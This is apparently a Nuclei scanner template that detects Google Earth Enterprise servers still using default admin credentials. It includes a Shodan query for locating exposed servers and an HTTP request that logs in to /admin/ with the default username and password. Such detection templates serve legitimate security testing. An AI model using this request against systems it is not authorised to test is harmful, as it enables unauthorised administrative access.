id: google-earth-dlogin

info:
  name: Google Earth Enterprise Default Login
  author: orpheus,johnjhacking
  severity: high
  description: |
    Google Earth Enterprise default login credentials were discovered.
  reference:
    - https://johnjhacking.com/blog/gee-exploitation/
    - https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  remediation: |
    To reset the username and password:

    sudo /opt/google/gehttpd/bin/htpasswd -c
    /opt/google/gehttpd/conf.d/.htpasswd geapacheuse"
  metadata:
    shodan-query: title:"GEE Server"
  tags: default-login,google-earth

requests:
  - raw:
      - |
        GET /admin/ HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    attack: pitchfork
    payloads:
      username:
        - geapacheuser

      password:
        - geeadmin

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        condition: and
        words:
          - 'DashboardPanel'
          - 'Earth Enterprise Server'

# Enhanced by mp on 2022/03/10